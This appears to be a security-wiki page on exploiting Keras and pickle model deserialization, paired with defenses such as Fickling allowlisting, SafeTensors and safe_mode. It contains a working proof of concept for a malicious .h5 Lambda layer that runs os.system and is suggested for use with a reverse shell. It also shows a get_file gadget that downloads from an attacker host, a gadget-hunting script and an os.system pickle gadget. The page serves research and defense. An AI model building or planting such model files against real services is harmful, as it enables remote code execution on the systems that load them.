Many production stacks still accept legacy TensorFlow-Keras HDF5 model files (.h5). If an attacker can upload a model that the server later loads or runs inference on, a Lambda layer can execute arbitrary Python on load/build/predict.
Minimal PoC to craft a malicious .h5 that executes a reverse shell when deserialized or used:
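A minimal sketch of such an artifact, using a benign canary payload instead of a reverse shell (YOUR_IP, the layer name, and the file name are placeholders; assumes TensorFlow 2.x, where a true lambda's bytecode is marshalled into the HDF5 config):

```python
# Sketch: embed a marshalled lambda in a legacy .h5 model. A real lambda is used
# so its bytecode is serialized into the file rather than just a function name.
import tensorflow as tf

# Benign canary payload; runs os.system and passes the tensor through unchanged.
payload = lambda x: (__import__("os").system("ping -c 1 YOUR_IP"), x)[1]

model = tf.keras.Sequential([
    tf.keras.layers.InputLayer(input_shape=(1,)),
    tf.keras.layers.Lambda(payload, name="preprocess"),  # innocuous-looking name
])
model.save("malicious.h5")  # legacy HDF5 format accepted by many stacks

# Victim side: the payload runs when the model graph is rebuilt at load time and
# again when data flows through the layer.
# m = tf.keras.models.load_model("malicious.h5")
# m.predict(tf.zeros((1, 1)))
```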
- Trigger points: code may run multiple times (e.g., during layer build/first call, model.load_model, and predict/fit). Make payloads idempotent.
- Version pinning: match the victim’s TF/Keras/Python to avoid serialization mismatches. For example, build artifacts under Python 3.8 with TensorFlow 2.13.1 if that’s what the target uses.
- Quick environment replication:
```dockerfile
FROM python:3.8-slim
RUN pip install tensorflow-cpu==2.13.1
```
- Validation: a benign payload like os.system("ping -c 1 YOUR_IP") helps confirm execution (e.g., observe ICMP with tcpdump) before switching to a reverse shell.
## Post-fix gadget surface inside allowlist
Even with allowlisting and safe mode, a broad surface remains among allowed Keras callables. For example, keras.utils.get_file can download arbitrary URLs to user-selectable locations.
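A quick sketch of that primitive in isolation (the URL and paths below are placeholders):

```python
# Sketch: keras.utils.get_file fetches an arbitrary URL and writes it to an
# attacker-influenced location, giving file-write and SSRF-like primitives.
from keras.utils import get_file

path = get_file(
    fname="innocuous.txt",                         # destination file name
    origin="http://attacker.example/payload.txt",  # arbitrary URL (placeholder)
    cache_dir="/tmp/poc",                          # user-selectable directory
)
print("written to", path)
```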
Such gadgets are built via a Lambda that references an allowed function (not serialized Python bytecode).
Important limitation:
- Lambda.call() prepends the input tensor as the first positional argument when invoking the target callable. Chosen gadgets must tolerate an extra positional arg (or accept *args/**kwargs). This constrains which functions are viable.
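A small sketch of that constraint, using a stand-in callable (`probe` below is illustrative, not an actual gadget):

```python
# Sketch: Lambda passes the layer input as the first positional argument, so a
# wrapped callable always receives the tensor whether it wants it or not.
import numpy as np
import keras

def probe(*args, **kwargs):
    # Stand-in for an allowed, side-effectful callable.
    print(f"invoked with {len(args)} positional arg(s); first is {type(args[0]).__name__}")
    return args[0]

layer = keras.layers.Lambda(probe)
layer(np.zeros((1, 2)))   # prints that the input tensor was prepended
```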
Potential impact:

- Network callbacks/SSRF-like effects depending on environment
- Chaining to code execution if written paths are later imported/executed or added to PYTHONPATH, or if a writable execution-on-write location exists
## ML pickle import allowlisting for AI/ML models (Fickling)
Many AI/ML model formats (PyTorch .pt/.pth/.ckpt, joblib/scikit-learn, older TensorFlow artifacts, etc.) embed Python pickle data. Attackers routinely abuse pickle GLOBAL imports and object constructors to achieve RCE or model swapping during load. Blacklist-based scanners often miss novel or unlisted dangerous imports.
A practical fail-closed defense is to hook Python’s pickle deserializer and only allow a reviewed set of harmless ML-related imports during unpickling. Trail of Bits’ Fickling implements this policy and ships a curated ML import allowlist built from thousands of public Hugging Face pickles.
Security model for “safe” imports (intuitions distilled from research and practice): an imported symbol used by a pickle must satisfy all of the following:
- Not execute code or cause execution (no compiled/source code objects, shelling out, hooks, etc.)
- Not get/set arbitrary attributes or items
- Not import or obtain references to other Python objects from the pickle VM
- Not trigger any secondary deserializers (e.g., marshal, nested pickle), even indirectly
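As a concrete illustration of the first criterion, a classic os.system `__reduce__` gadget should be refused by a fail-closed import allowlist before anything executes (a sketch; the exact exception class depends on the installed Fickling version, so it is caught broadly):

```python
# Sketch: an object whose __reduce__ asks the unpickler to call os.system("id").
# The pickle stream therefore imports a code-executing symbol, which fails the
# "does not execute code" criterion and should be blocked before it runs.
import os
import pickle
import tempfile

import fickling

class Evil:
    def __reduce__(self):
        return (os.system, ("id",))

path = os.path.join(tempfile.mkdtemp(), "evil.pkl")
with open(path, "wb") as f:
    pickle.dump(Evil(), f)

fickling.always_check_safety()      # hook pickle.load() globally
try:
    with open(path, "rb") as f:
        pickle.load(f)              # expected to raise instead of running os.system
except Exception as exc:
    print("blocked:", exc)
```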
Enable Fickling’s protections as early as possible in process startup so that any pickle loads performed by frameworks (torch.load, joblib.load, etc.) are checked:
```python
import fickling
# Sets global hooks on the stdlib pickle module
fickling.hook.activate_safe_ml_environment()
```
Operational tips:
- You can temporarily disable/re-enable the hooks where needed:
```python
fickling.hook.deactivate_safe_ml_environment()
# ... load fully trusted files only ...
fickling.hook.activate_safe_ml_environment()
```
- If a known-good model is blocked, extend the allowlist for your environment after reviewing the symbols:
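A sketch, assuming the also_allow parameter exposed by recent Fickling releases (verify the exact signature against your installed version; the listed symbols are placeholders):

```python
import fickling

# Placeholders: symbols you reviewed and deemed harmless for your environment.
fickling.hook.activate_safe_ml_environment(
    also_allow=[
        "my_project.layers.CustomTokenizer",
        "my_project.layers.PositionalEncoding",
    ]
)
```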
- Fickling also exposes generic runtime guards if you prefer more granular control:
- fickling.always_check_safety() to enforce checks for all pickle.load()
- with fickling.check_safety(): for scoped enforcement
- fickling.load(path) / fickling.is_likely_safe(path) for one-off checks
- Prefer non-pickle model formats when possible (e.g., SafeTensors). If you must accept pickle, run loaders under least privilege without network egress and enforce the allowlist.
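For example, a minimal SafeTensors round-trip (a sketch; assumes the safetensors and torch packages are installed):

```python
# Sketch: SafeTensors stores raw tensor bytes plus a JSON header; loading never
# executes code, unlike pickle-based checkpoints.
import torch
from safetensors.torch import load_file, save_file

save_file({"weight": torch.zeros(2, 2)}, "weights.safetensors")
tensors = load_file("weights.safetensors")
print(tensors["weight"].shape)
```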
This allowlist-first strategy demonstrably blocks common ML pickle exploit paths while keeping compatibility high. In ToB’s benchmark, Fickling flagged 100% of synthetic malicious files and allowed ~99% of clean files from top Hugging Face repos.
## Researcher toolkit
1) Systematic gadget discovery in allowed modules
Enumerate candidate callables across keras, keras_nlp, keras_cv, keras_hub and prioritize those with file/network/process/env side effects.
<details>
<summary>Enumerate potentially dangerous callables in allowlisted Keras modules</summary>
```python
import importlib, inspect, pkgutil

ALLOWLIST = ["keras", "keras_nlp", "keras_cv", "keras_hub"]
SUSPICIOUS = ("file", "open", "path", "load", "save", "download", "get", "fetch",
              "url", "request", "exec", "eval", "system", "popen", "spawn",
              "proc", "environ")

candidates = set()
for root in ALLOWLIST:
    try:
        pkg = importlib.import_module(root)
    except ImportError:
        continue  # package not installed in this environment
    for info in pkgutil.walk_packages(pkg.__path__, prefix=root + "."):
        try:
            mod = importlib.import_module(info.name)
        except Exception:
            continue  # some submodules need optional dependencies
        for name, obj in inspect.getmembers(mod, callable):
            if any(tok in name.lower() for tok in SUSPICIOUS):
                candidates.add(f"{info.name}.{name}")

print("\n".join(sorted(candidates)[:200]))
```
</details>
2) Direct deserialization testing (no .keras archive needed)
Feed crafted dicts directly into Keras deserializers to learn accepted params and observe side effects.
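A minimal sketch of that workflow (the Dense config is a harmless stand-in; swap in the class and parameters under test; assumes Keras 3):

```python
# Sketch: drive the deserializer directly with a handcrafted config dict and
# observe which parameters are accepted and which side effects fire.
import keras

crafted = {
    "module": "keras.layers",
    "class_name": "Dense",
    "config": {"units": 4, "activation": "relu"},
    "registered_name": None,
}

obj = keras.saving.deserialize_keras_object(crafted)
print(type(obj), obj.get_config())
```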
Keras exists in multiple codebases/eras with different guardrails and formats.
Repeat tests across codebases and formats (.keras vs legacy HDF5) to uncover regressions or missing guards.
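A small sketch of exercising both formats with the same toy model (assumes Keras 3 with h5py available for the legacy path):

```python
# Sketch: build one toy model, write both formats, then reload each to compare
# which guardrails apply on the load path (e.g., safe_mode for .keras archives).
import keras

model = keras.Sequential([keras.Input(shape=(4,)), keras.layers.Dense(1)])
model.save("probe.keras")   # modern archive format
model.save("probe.h5")      # legacy HDF5 path (emits a legacy-format warning)

keras.models.load_model("probe.keras", safe_mode=True)
keras.models.load_model("probe.h5")   # note which checks the legacy loader skips
```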
## Defensive recommendations
- Treat model files as untrusted input. Only load models from trusted sources.
- Keep Keras up to date; use Keras ≥ 3.9 to benefit from allowlisting and type checks.
- Do not set safe_mode=False when loading models unless you fully trust the file.
- Consider running deserialization in a sandboxed, least-privileged environment without network egress and with restricted filesystem access.
- Enforce allowlists/signatures for model sources and integrity checking where possible.
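For example, keep the default safe_mode enabled when loading uploaded files (a sketch; the path is a placeholder):

```python
import keras

# safe_mode=True (the default in Keras 3) refuses to deserialize arbitrary
# Lambda bytecode from a .keras archive; leave it enabled for untrusted files.
model = keras.models.load_model("untrusted_upload.keras", safe_mode=True)
```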
## References
- [Hunting Vulnerabilities in Keras Model Deserialization (huntr blog)](https://blog.huntr.com/hunting-vulnerabilities-in-keras-model-deserialization)
- [CVE-2025-1550 – Keras arbitrary module import (≤ 3.8)](https://nvd.nist.gov/vuln/detail/CVE-2025-1550)